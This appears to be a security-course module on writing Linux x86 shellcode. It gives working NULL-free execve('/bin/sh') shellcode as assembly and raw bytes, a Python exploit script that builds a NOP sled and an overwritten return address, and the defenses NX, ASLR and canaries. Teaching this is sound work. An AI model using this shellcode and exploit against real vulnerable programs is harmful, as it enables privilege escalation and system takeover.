Shellcode

The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.

Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.

The Linux system-call interface

User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:

ABI	Trigger instruction	Syscall # register	Arg registers (in order)
x86 32-bit (`int $0x80`)	`int $0x80`	`%eax`	`%ebx`, `%ecx`, `%edx`, `%esi`, `%edi`, `%ebp`
x86-64 (`syscall`)	`syscall`	`%rax`	`%rdi`, `%rsi`, `%rdx`, `%r10`, `%r8`, `%r9`

The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:

mov $0x14, %eax   ; syscall number for getpid
int $0x80         ; enter the kernel

Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.

The target syscall: execve

The goal of most shellcode is to call execve, which replaces the current process image with a new program:

int execve(const char *filename, char *const argv[], char *const envp[]);

Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.

On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:

Register	Value
`%eax`	`0x0b` (syscall number)
`%ebx`	pointer to the filename string (`"/bin/sh"`)
`%ecx`	pointer to the argv array (`{ptr_to_binsh, NULL}`)
`%edx`	pointer to the envp array (NULL — no environment)

Building execve shellcode step by step

The challenge is that shellcode is position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read the addresses back from %esp.

Step 1 — Push "/bin/sh" onto the stack

x86 push works on 4-byte dwords. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the double slash is harmless to the kernel). Push a null terminator first, then the string in reverse order:

xor  %eax, %eax          ; zero eax (no NULL bytes in the instruction)
mov  %eax, %edx          ; edx = 0  (envp = NULL)
push %eax                ; push null terminator for the string
push $0x68732f6e         ; "n/sh" (little-endian: 6e 2f 73 68)
push $0x69622f2f         ; "//bi" (little-endian: 2f 2f 62 69)
mov  %esp, %ebx          ; ebx --> "//bin/sh\0" on the stack

After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.

Step 2 — Build the argv array and set %ecx

execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:

push %eax                ; argv[1] = NULL
push %ebx                ; argv[0] = pointer to "//bin/sh"
mov  %esp, %ecx          ; ecx --> { ptr_to_binsh, NULL }

Step 3 — Set %eax and invoke

movb $0x0b, %al          ; eax = 0x0b (low byte only — avoids NULL bytes)
int  $0x80               ; syscall: execve("//bin/sh", argv, NULL)

Complete NULL-free shellcode

xor  %eax, %eax          ; eax = 0
mov  %eax, %edx          ; edx = 0  (envp)
push %eax                ; null terminator
push $0x68732f6e         ; "n/sh"
push $0x69622f2f         ; "//bi"
mov  %esp, %ebx          ; ebx --> filename
push %eax                ; argv[1] = NULL
push %ebx                ; argv[0] = ptr to filename
mov  %esp, %ecx          ; ecx --> argv
movb $0x0b, %al          ; eax = 11
int  $0x80

The NULL-byte problem — and how to fix it

String-copying functions like strcpy and gets stop at the first \x00 byte. A single NULL byte anywhere in the shellcode silently truncates the payload — the rest of the code never reaches the buffer.

The naive version of this shellcode contains several NULL bytes:

b8 0b 00 00 00   mov  $0xb, %eax      ← three NULLs
b9 00 00 00 00   mov  $0x0, %ecx      ← four NULLs
ba 00 00 00 00   mov  $0x0, %edx      ← four NULLs
6a 00            push $0x0            ← one NULL

The fixes applied above:

Naive (contains NULLs)	NULL-free replacement	Why it works
`mov $0x0, %eax`	`xor %eax, %eax`	XOR of a register with itself is always 0; opcode `31 c0` has no zero bytes
`push $0x0`	`push %eax` (after zeroing)	pushes the already-zeroed register
`mov $0x0b, %eax` (opcode `b8 0b 00 00 00`)	`movb $0x0b, %al` (opcode `b0 0b`)	writes only the low byte; upper bytes were already zeroed by `xor`
`mov $0x0, %edx`	`mov %eax, %edx` (after zeroing `%eax`)	copies zero without embedding a zero byte

Assembling and extracting the bytes

Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:

gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\\t\K[0-9a-f ]+(?=\t)'

The slides show the assembled bytes for the complete shellcode:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80

No byte in this sequence is \x00.

Delivering the shellcode: the exploit script

With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:

#!/usr/bin/env python3
import sys

shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)

content = bytearray(0x90 for _ in range(100))  # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode

ret    = 0xffffcfd0  # estimated address inside the NOP sled
offset = 76          # bytes from buffer start to saved return address
L = 4                # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

sys.stdout.buffer.write(content)

Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.

Guessing the address: the NOP sled

Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.

The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the sled, execution slides harmlessly down the NOPs into the shellcode. A 100-byte NOP sled widens the valid target window by 100 addresses, making imprecise guesses succeed.

Defenses that break this attack

Two mitigations directly target shellcode injection:

Non-Executable Stack (NX / W^X): Hardware marks stack pages as non-executable. If %eip ever points into the stack, the CPU raises a fault. This stops injected shellcode cold — which is why modern exploit technique pivoted to Return-Oriented Programming (ROP), reusing existing executable code.
ASLR (Address Space Layout Randomization): The OS randomizes the base address of the stack (and heap, libraries) on every execution. With kernel.randomize_va_space=2, both stack and heap addresses change each run, making it hard to guess where the NOP sled lives. The gcc -no-pie -fno-pic flags produce position-independent-code-free binaries that use absolute addresses and are easier to exploit; PIE binaries with ASLR are much harder.
Stack canaries (StackGuard): A secret value placed between the buffer and the return address; overwriting it is detected before ret executes.

Key takeaways

Shellcode is self-contained machine code injected into a vulnerable process to perform an action — typically spawning a shell via a direct syscall.
The 32-bit Linux syscall ABI: load the syscall number into %eax, arguments into %ebx/%ecx/%edx, then execute int $0x80.
sys_execve is syscall 0x0b; its three arguments map to %ebx (filename), %ecx (argv), %edx (envp).
Position independence is achieved by building strings and pointer arrays on the stack at runtime and reading addresses from %esp.
Every instruction that encodes a zero byte must be replaced: xor %eax,%eax instead of mov $0,%eax; movb $0x0b,%al instead of mov $0x0b,%eax.
A NOP sled (\x90 bytes prepended to the shellcode) tolerates imprecise guesses of the shellcode's address.
NX stack defeats injected shellcode by making stack pages non-executable; ASLR makes the injection address hard to guess.